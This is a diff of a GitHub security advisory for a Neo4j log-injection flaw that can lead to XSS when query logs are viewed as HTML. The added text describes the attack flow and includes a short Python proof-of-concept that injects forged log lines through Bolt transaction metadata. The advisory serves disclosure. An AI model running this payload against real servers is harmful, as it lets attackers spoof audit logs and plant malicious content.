[GHSA-xr72-g735-4vwp] Neo4j Enterprise and Community editions have insufficient escaping of unicode characters in query log

advisories/github-reviewed/2026/02/GHSA-xr72-g735-4vwp/GHSA-xr72-g735-4vwp.json

@@ -1,19 +1,14 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-xr72-g735-4vwp",
-  "modified": "2026-02-06T19:41:15Z",
+  "modified": "2026-02-06T19:41:16Z",
   "published": "2026-02-06T15:31:03Z",
   "aliases": [
     "CVE-2026-1337"
   ],
-  "summary": "Neo4j Enterprise and Community editions have insufficient escaping of unicode characters in query log",
-  "details": "Insufficient escaping of unicode characters in query log in Neo4j Enterprise and Community editions prior to 2026.01 can lead to XSS if the user opens the logs in a tool that treats them as HTML. There is no security impact on Neo4j products, but this advisory is released as a precaution to treat the logs as plain text if using versions prior to 2026.01.\n\nProof of concept exploit:  https://github.com/JoakimBulow/CVE-2026-1337",
-  "severity": [
-    {
-      "type": "CVSS_V4",
-      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"
-    }
-  ],
+  "summary": "Xss Vulnerability - Neo4j Enterprise and Community editions have insufficient escaping of unicode characters in query log",
+  "details": "# Vulnerability in Neo4j Enterprise and Community Editions (CVE-2026-1337)\n\nNeo4j Enterprise and Community editions prior to 2026.01 are vulnerable to insufficient escaping of Unicode characters in the query log, which can lead to Cross-Site Scripting (XSS) if the logs are opened in a tool that interprets them as HTML. There is no direct security impact on Neo4j products themselves, but this advisory is issued as a precaution to treat the logs as plain text when using versions prior to 2026.01.\n\n## Details\n\nThe vulnerability arises from improper handling of control characters (e.g., newlines) in the metadata field of Bolt transactions when Neo4j is not configured to use JSON-formatted logging. An authenticated user can inject arbitrary log entries, potentially spoofing queries or introducing malicious content.\n\n- **Vulnerability Type**: CWE-117 (Improper Output Neutralization for Logs) / CWE-79 (Improper Neutralization of Input During Web Page Generation - XSS)\n- **Root Cause**: Failure to escape control characters like `\\n` in query log entries, allowing log injection when logging is in plain text format.\n- **Execution Flow**:\n  1. An authenticated attacker connects to the Neo4j Bolt port (default: 7687).\n  2. They initiate a transaction with malicious metadata containing newlines and crafted log lines.\n  3. The unescaped metadata is written to `query.log`, injecting fake entries.\n  4. If logs are viewed in a web-based tool or terminal, it could lead to XSS or terminal manipulation via ANSI escapes.\n\n## Proof of Concept (PoC)\n\nThe vulnerability can be demonstrated using a Python script with the Neo4j driver. A proof-of-concept is available at: https://github.com/JoakimBulow/CVE-2026-1337\n\n**Steps to Reproduce:**\n1. Set up a Neo4j instance prior to 2026.01 with plain text logging (not JSON).\n2. Install the Neo4j Python driver: `pip install neo4j`.\n3. Run the following script (adapted from the PoC):\n\n```python\nfrom neo4j import GraphDatabase\n\nuri = \"bolt://127.0.0.1:7687\"\nusername = \"neo4j\"\npassword = \"your_password\"\n\npayload = \"\\n2025-12-05 13:08:34.148+0000 INFO  Query started: id:700 - MATCH (n:FakeQuery1) RETURN n LIMIT 1\\n2025-12-05 13:08:34.148+0000 INFO  Query started: id:701 - MATCH (n:FakeQuery2) RETURN n LIMIT 1\"\n\ndriver = GraphDatabase.driver(uri, auth=(username, password))\n\nwith driver.session() as session:\n    tx = session.begin_transaction(metadata={\"x\": payload})\n    tx.run(\"RETURN 1\")\n    tx.commit()\n\ndriver.close()",
+  "severity": [],
   "affected": [
     {
       "package": {